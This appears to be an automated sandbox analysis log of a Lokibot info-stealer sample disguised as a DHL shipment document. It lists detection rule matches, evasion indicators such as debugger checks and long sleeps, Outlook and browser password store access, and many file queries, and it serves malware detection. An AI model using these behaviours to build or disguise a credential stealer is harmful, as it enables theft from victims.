                Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: DHL_Express_Shipment_DOC.exe PID: 5364, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_0040549C 3_2_0040549C
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_004029D4 3_2_004029D4
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: String function: 00405B6F appears 42 times
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Process Stats: CPU usage > 98%
                Source: DHL_Express_Shipment_DOC.exe, 00000000.00000000.305575984.0000000000E62000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamexqcD.exeR vs DHL_Express_Shipment_DOC.exe
                Source: DHL_Express_Shipment_DOC.exe | Binary or memory string: OriginalFilenamexqcD.exeR vs DHL_Express_Shipment_DOC.exe
                Source: DHL_Express_Shipment_DOC.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: DHL_Express_Shipment_DOC.exe | ReversingLabs: Detection: 18%
                Source: DHL_Express_Shipment_DOC.exe | Virustotal: Detection: 30%
                Source: DHL_Express_Shipment_DOC.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Process created: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Process created: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 3_2_0040650A
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_Express_Shipment_DOC.exe.log
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/3@0/1
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 3_2_0040434D
                Source: DHL_Express_Shipment_DOC.exe, 00000003.00000003.465267732.00000000033C7000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DHL_Express_Shipment_DOC.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: DHL_Express_Shipment_DOC.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: DHL_Express_Shipment_DOC.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: DHL_Express_Shipment_DOC.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: xqcD.pdb source: DHL_Express_Shipment_DOC.exe

                Data Obfuscation

                Source: Yara match | File source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.DHL_Express_Shipment_DOC.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: DHL_Express_Shipment_DOC.exe PID: 5364, type: MEMORYSTR
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_00402AC0 push eax; ret 3_2_00402AFC
                Source: initial sample | Static PE information: section name: .text entropy: 7.418461164070656
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Process information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe TID: 3260 | Thread sleep time: -40023s >= -30000s
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe TID: 1316 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe TID: 1236 | Thread sleep time: -180000s >= -30000s
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 3_2_00403D74
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Thread delayed: delay time: 40023
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Thread delayed: delay time: 60000
                Source: DHL_Express_Shipment_DOC.exe, 00000003.00000002.486703959.0000000001678000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap, 3_2_00402B7C
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h] 3_2_0040317B
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Memory allocated: page read and write | page guard
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Process created: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Queries volume information: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe VolumeInformation
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
